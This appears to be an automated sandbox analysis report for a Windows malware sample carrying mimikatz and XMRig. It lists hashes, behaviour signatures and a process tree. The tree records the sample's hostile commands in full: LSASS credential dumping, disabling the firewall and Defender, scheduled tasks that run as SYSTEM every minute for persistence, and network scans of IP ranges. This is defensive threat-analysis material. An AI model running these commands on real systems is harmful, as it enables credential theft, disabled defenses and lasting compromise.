Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2024 12:54

General

  • Target

    2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe

  • Size

    9.9MB

  • MD5

    95fce9e61d3584e0f6e908b4fad47f63

  • SHA1

    26071cb21930728be85770192502253627a27939

  • SHA256

    16e7c4931abda279940e40aefa791792814db31d7036410d5ed27ed39dcf03e6

  • SHA512

    e17d102d4fc936394c0d8d684b916c814f610c7f1d4102904c55417b8fe35bbdf8f9ced44209e51b5d2cd66f44de6cd6356e2eb3a099699c4121aed4606c8490

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30613) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2044
      • C:\Windows\TEMP\stjqapuut\ejzklm.exe
        "C:\Windows\TEMP\stjqapuut\ejzklm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4972
    • C:\Users\Admin\AppData\Local\Temp\2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uzepkltb\zyejeil.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4256
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:492
        • C:\Windows\uzepkltb\zyejeil.exe
          C:\Windows\uzepkltb\zyejeil.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4880
    • C:\Windows\uzepkltb\zyejeil.exe
      C:\Windows\uzepkltb\zyejeil.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1484
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:3728
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4528
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3252
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
              PID:3800
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1616
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2688
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4928
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:1036
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3720
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1988
            • C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe
              C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:4856
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2316
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1756
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4912
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1468
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4280
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4368
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:208
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:952
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1668
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
                PID:4208
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4420
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:436
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                  PID:2248
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:3848
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt
                2⤵
                  PID:1788
                  • C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe
                    C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2156
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lrcwzntnt\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:3544
                  • C:\Windows\lrcwzntnt\Corporate\vfshost.exe
                    C:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2968
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"
                  2⤵
                    PID:3632
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1104
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4092
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3232
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4056
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:4260
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"
                    2⤵
                      PID:3740
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3028
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:5060
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:688
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1828
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:1108
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2972
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:456
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4428
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1348
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3060
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3784
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:5004
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2784
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4908
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop SharedAccess
                      2⤵
                        PID:4528
                        • C:\Windows\SysWOW64\net.exe
                          net stop SharedAccess
                          3⤵
                            PID:2260
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop SharedAccess
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:3532
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh firewall set opmode mode=disable
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1616
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh firewall set opmode mode=disable
                            3⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            PID:2616
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh Advfirewall set allprofiles state off
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2904
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh Advfirewall set allprofiles state off
                            3⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:5000
                        • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                          C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 792 C:\Windows\TEMP\lrcwzntnt\792.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4792
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop MpsSvc
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4872
                          • C:\Windows\SysWOW64\net.exe
                            net stop MpsSvc
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4760
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop MpsSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:928
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop WinDefend
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:3256
                          • C:\Windows\SysWOW64\net.exe
                            net stop WinDefend
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4004
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop WinDefend
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1476
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2416
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3544
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1564
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config MpsSvc start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2420
                          • C:\Windows\SysWOW64\sc.exe
                            sc config MpsSvc start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:3012
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config SharedAccess start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2512
                          • C:\Windows\SysWOW64\sc.exe
                            sc config SharedAccess start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:2936
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config WinDefend start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4896
                          • C:\Windows\SysWOW64\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:3720
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config wuauserv start= disabled
                          2⤵
                            PID:4588
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:3248
                          • C:\Windows\TEMP\xohudmc.exe
                            C:\Windows\TEMP\xohudmc.exe
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of SetWindowsHookEx
                            PID:964
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 380 C:\Windows\TEMP\lrcwzntnt\380.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2312
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2044 C:\Windows\TEMP\lrcwzntnt\2044.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:448
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2640 C:\Windows\TEMP\lrcwzntnt\2640.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4900
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2848 C:\Windows\TEMP\lrcwzntnt\2848.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1616
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2856 C:\Windows\TEMP\lrcwzntnt\2856.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4956
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3128 C:\Windows\TEMP\lrcwzntnt\3128.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3104
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3832 C:\Windows\TEMP\lrcwzntnt\3832.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3736
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3928 C:\Windows\TEMP\lrcwzntnt\3928.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1360
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3992 C:\Windows\TEMP\lrcwzntnt\3992.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1040
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4080 C:\Windows\TEMP\lrcwzntnt\4080.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4792
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4108 C:\Windows\TEMP\lrcwzntnt\4108.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:776
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4104 C:\Windows\TEMP\lrcwzntnt\4104.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3176
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4548 C:\Windows\TEMP\lrcwzntnt\4548.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4156
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3744 C:\Windows\TEMP\lrcwzntnt\3744.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2176
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2012 C:\Windows\TEMP\lrcwzntnt\2012.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3800
                          • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                            C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 180 C:\Windows\TEMP\lrcwzntnt\180.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2820
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c C:\Windows\lrcwzntnt\bmkbibntg\scan.bat
                            2⤵
                              PID:3424
                              • C:\Windows\lrcwzntnt\bmkbibntg\nusubcedp.exe
                                nusubcedp.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:4260
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:5200
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1828
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                3⤵
                                  PID:4388
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                    PID:4128
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                    3⤵
                                      PID:2968
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                        PID:5968
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3180
                                  • C:\Windows\SysWOW64\joxnkm.exe
                                    C:\Windows\SysWOW64\joxnkm.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SetWindowsHookEx
                                    PID:904
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\zyejeil.exe
                                    1⤵
                                      PID:2688
                                      • C:\Windows\ime\zyejeil.exe
                                        C:\Windows\ime\zyejeil.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2372
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
                                      1⤵
                                        PID:412
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          2⤵
                                            PID:2424
                                          • C:\Windows\system32\cacls.exe
                                            cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
                                            2⤵
                                              PID:1752
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
                                            1⤵
                                              PID:4512
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                2⤵
                                                  PID:1064
                                                • C:\Windows\system32\cacls.exe
                                                  cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
                                                  2⤵
                                                    PID:3660
                                                • C:\Windows\system32\cmd.EXE
                                                  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\zyejeil.exe
                                                  1⤵
                                                    PID:5252
                                                    • C:\Windows\ime\zyejeil.exe
